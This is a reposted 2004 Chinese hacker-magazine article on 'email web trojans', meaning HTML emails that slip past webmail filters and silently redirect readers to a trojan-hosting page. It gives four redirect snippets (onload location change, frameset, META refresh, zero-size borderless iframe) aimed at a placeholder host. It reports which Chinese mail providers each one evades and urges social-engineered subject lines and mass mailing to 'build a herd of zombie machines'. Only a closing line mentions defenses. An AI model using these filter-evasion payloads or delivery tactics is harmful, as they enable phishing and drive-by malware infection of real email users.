暴风雨的先驱——邮件网页木马
<P><FONT color=#f70909>作者:xyzreg来源:邪恶八进制 中国</FONT></P>
<P>注:此文已发表在《黑客防线》2004年第10期上,版权归其所有</P>
<P> 大家肯定对网页<a href="http://hackbase.com/hacker" target="_blank" >木马</A>已经很熟悉了,但大家可能对邮件网页<a href="http://hackbase.com/hacker" target="_blank" >木马</A>还不是很熟悉。其实这个也许有些高手以前已经发现并使用很久了。但我一直未见网上及杂志上有此方面的内容。这里我就以<a href="http://hackbase.com/network" target="_blank" >技术</A>共享的原则跟大家谈谈邮件网页<a href="http://hackbase.com/hacker" target="_blank" >木马</A>的思路及实现方法。</P>
<P> 邮件网页<a href="http://hackbase.com/hacker" target="_blank" >木马</A>的危害巨大,它能化被动为主动。目前网络上流行的网页<a href="http://hackbase.com/hacker" target="_blank" >木马</A>其实是很被动的,它需要被害者点击目标网址。随着现在网民的安全观念的增强,网民一般不会轻易点击陌生的网址。但邮件网页<a href="http://hackbase.com/hacker" target="_blank" >木马</A>就不一样了,你可以将电子邮件发送到你想要<a href="http://hackbase.com/hacker" target="_blank" >攻击</A>的目标<a href="http://mail.hackbase.com/" target="_blank" >信箱</A>。只要你根据社会工程学及心理学的<a href="http://hackbase.com/network/zs" target="_blank" >知识</A>,将邮件的标题看上去不明显像是垃圾邮件或广告,那么接收者肯定会点击此邮件的。只要他点击了此邮件主题,看了信,哈哈,他就中招了!当然你也可以通过邮件群发器,这样的话,传播速率比普通的网页<a href="http://hackbase.com/hacker" target="_blank" >木马</A>以及电子书<a href="http://hackbase.com/hacker" target="_blank" >木马</A>不知高多少呢!而且它有个最大的优点,那就是具有目标可指定性。它可以<a href="http://hackbase.com/hacker" target="_blank" >攻击</A>你想要的指定用户。这一点是普通方法无法比拟的。
邮件网页<a href="http://hackbase.com/hacker" target="_blank" >木马</A>其实就是在发E-mail以HTML方式内嵌网页<a href="http://hackbase.com/hacker" target="_blank" >木马</A>,使邮件本身成为一张网页<a href="http://hackbase.com/hacker" target="_blank" >木马</A>。到这时你也许回大呼,我怎么没想到啊!呵呵,不怕做不到,只怕想不到啊。其实有些<a href="http://hackbase.com/network" target="_blank" >技术</A>本身并不难,但就是怕不往这方面想啊。我还是赶快转入正题吧,否则,坏柿子扔过来啦!闪!
聪明的你此时可能会说,邮件网页<a href="http://hackbase.com/hacker" target="_blank" >木马</A>岂不是很简单啊,只要在发邮件是选择以HTML方式发送,再将网页<a href="http://hackbase.com/hacker" target="_blank" >木马</A>的源<a href="http://hackbase.com/hacker" target="_blank" >代码</A>写入即可。事实上当然没这么简单,因为国内的绝大部分电子<a href="http://mail.hackbase.com/" target="_blank" >信箱</A>都对其中一些关键<a href="http://hackbase.com/hacker" target="_blank" >代码</A>进行的屏蔽过滤。因而本文将重点<a href="http://hackbase.com/hacker/leak" target="_blank" >研究</A>怎样突破重围,在电子邮件中引入网页<a href="http://hackbase.com/hacker" target="_blank" >木马</A>,达到我们的目的。
一般的网页<a href="http://hackbase.com/hacker" target="_blank" >木马</A>都用到javasccript,但绝大部分邮件系统都对<script>标记作了屏蔽。从而我们只能另辟新法。我们可以不直接将网页<a href="http://hackbase.com/hacker" target="_blank" >木马</A>的<a href="http://hackbase.com/hacker" target="_blank" >代码</A>写入邮件中,因为如果写入的话,有关<a href="http://hackbase.com/hacker" target="_blank" >代码</A>会被屏蔽,网页<a href="http://hackbase.com/hacker" target="_blank" >木马</A>将失效。我们可以写入转向<a href="http://hackbase.com/hacker" target="_blank" >代码</A>,使用户浏览此邮件时转向我们放在自己网站上的网页<a href="http://hackbase.com/hacker" target="_blank" >木马</A>。当然,邮件网页<a href="http://hackbase.com/hacker" target="_blank" >木马</A>的难点就在转向<a href="http://hackbase.com/hacker" target="_blank" >代码</A>。写转向<a href="http://hackbase.com/hacker" target="_blank" >代码</A>要有讲究,因为写得不巧妙的话,<a href="http://hackbase.com/hacker" target="_blank" >代码</A>将会被邮件系统屏蔽。
下面笔者来谈谈几种有效的可以在电子邮件中引入网页<a href="http://hackbase.com/hacker" target="_blank" >木马</A>的且没被邮件<a href="http://vip.hackbase.com/" target="_blank" >服务</A>器屏蔽的转向<a href="http://hackbase.com/hacker" target="_blank" >代码</A>。因为绝大部分邮件系统都对<script>标记作了屏蔽,所以为了转向<a href="http://hackbase.com/hacker" target="_blank" >代码</A>有效,均不使用JS和VBS标记。
1. window.location 法,<a href="http://hackbase.com/hacker" target="_blank" >代码</A>如下
<body onload="window.location='http://xxxxx';"></body>
2. 框架法,<a href="http://hackbase.com/hacker" target="_blank" >代码</A>如下
<frameset cols="100%,*">
<frame src="<a href="http://xxxxx/" target="_blank" >http://xxxxx</A>" scrolling="auto">
</frameset>
其中scrolling参数值得注意,合理使用可加强隐蔽性。Cols参数可根据自己的实际情况作更改。
3. META标志法,<a href="http://hackbase.com/hacker" target="_blank" >代码</A>如下
<META HTTP-EQUIV="Refresh" CONTENT="0;URL= <a href="http://xxxxx/" target="_blank" >http://xxxxx</A>">
其中CONTENT后面的阿拉伯数字是代表过几秒中钟转入目标网页。
4. iframe内帧法
<iframe src="<a href="http://xxxxx/" target="_blank" >http://xxxxx</A>" width="0" height="0" frameborder="0">
其中width="0" height="0"是引入网页的大小尺寸,可以根据你的实际需要加以调整。其中的frameborder参数也很重要,如果使用的恰当的话,可以增强邮件网页<a href="http://hackbase.com/hacker" target="_blank" >木马</A>的隐蔽性。为了大家看的清楚,我将widt和height均设置的非零数值,转向的是网易的首页(如果转向的是放在自己网站上的网页<a href="http://hackbase.com/hacker" target="_blank" >木马</A>,呵呵......)。图1是设置frameborder=1的效果,图2是设置为frameborder=0的效果。</P>
<P>
大家由上面两幅图即可知道,如果设置为frameborder=1,邮件中可看见邮件<a href="http://vip.hackbase.com/" target="_blank" >服务</A>器自动加带的页脚广告。而设置为frameborder=0,则如图2所示,它不像普通的信件一样看见邮件<a href="http://vip.hackbase.com/" target="_blank" >服务</A>器自动加带的广告。大家可根据具体情况选择frameborder参数来获得最好的伪装引入效果,使对方感觉不到他所浏览的邮件是已经转向到你的网站上的网页<a href="http://hackbase.com/hacker" target="_blank" >木马</A>.
上述<a href="http://hackbase.com/hacker" target="_blank" >代码</A>笔者已经对国内的几乎所有电子<a href="http://mail.hackbase.com/" target="_blank" >信箱</A>作了测试,如网易,搜狐,新浪,亿唐,21CN,TOM等等。以上四种方法各有千秋。第一种方法的适应范围最小。比如网易、亿唐
都屏蔽了它。但第2、3、4方法在国内的<a href="http://mail.hackbase.com/" target="_blank" >信箱</A>测试中均通过。尤其第2、3种方法几乎百试百灵。当然第4种方法也很经典,参数多,隐蔽性强。大家可根据不同的目标<a href="http://mail.hackbase.com/" target="_blank" >信箱</A>选择最有效的转向引入<a href="http://hackbase.com/hacker" target="_blank" >代码</A>。
现在只要大家会制作网页<a href="http://hackbase.com/hacker" target="_blank" >木马</A>(关于网页<a href="http://hackbase.com/hacker" target="_blank" >木马</A><a href="http://hackbase.com/hacker" target="_blank" >木马</A>的制作方法,大家可以参见以往的黑防),拥有了性能优秀的后门程序或<a href="http://hackbase.com/hacker" target="_blank" >木马</A>程序,再配合本文所讲的邮件<a href="http://hackbase.com/hacker" target="_blank" >木马</A>引入<a href="http://hackbase.com/network" target="_blank" >技术</A>的话,贪心的再来个邮件群发,呵呵,你必将为所欲为,肉鸡成群。而且,这种方法具有<a href="http://hackbase.com/hacker" target="_blank" >攻击</A>目标可指定性的优点!一场暴风雪即将来临!大家以后还是少在公开场合公布<a href="http://mail.hackbase.com/" target="_blank" >信箱</A>哟!当然,稳妥的措施是邮件<a href="http://vip.hackbase.com/" target="_blank" >服务</A>器实行严格个<a href="http://hackbase.com/hacker" target="_blank" >代码</A>过滤,用户将邮件查看方式设置为以文本方式查看!
后记:笔者顺便还对几个国外著名的邮箱:hotmail以及Yahoo作了测试,发现它们过滤得都非常严格。上述的4种方法的<a href="http://hackbase.com/hacker" target="_blank" >代码</A>都被过滤了。此时我深感国内邮件提供商与国外的差距。安全观念的差距!但hotmail以及Yahoo并不是固若金汤。以色列网络安全公司GreyMagic Software已经发现hotmail以及Yahoo邮箱也存在过滤不严的<a href="http://www1.hackbase.com/News/World" target="_blank" >漏洞</A>。我们可以用同步多媒体集成语言的(SMIL)的HTML+TIME<a href="http://hackbase.com/network" target="_blank" >技术</A>来突破屏蔽,实现转向引入网页<a href="http://hackbase.com/hacker" target="_blank" >木马</A>的目的。庆幸的是此<a href="http://www1.hackbase.com/News/World" target="_blank" >漏洞</A>最近已经被hotmail以及Yahoo修补。但国内的几乎所有电子<a href="http://mail.hackbase.com/" target="_blank" >信箱</A>均存在此<a href="http://www1.hackbase.com/News/World" target="_blank" >漏洞</A>。当然深爱钻研<a href="http://hackbase.com/network" target="_blank" >技术</A>的你肯定会问,现在是否有针对hotmail以及Yahoo邮箱的有效的转向引入<a href="http://hackbase.com/hacker" target="_blank" >代码</A>。答案是肯定的!这个问题留给大家思考,大家可以向xml方向去发散,相信你一定会找到的!</P>
页:
[1]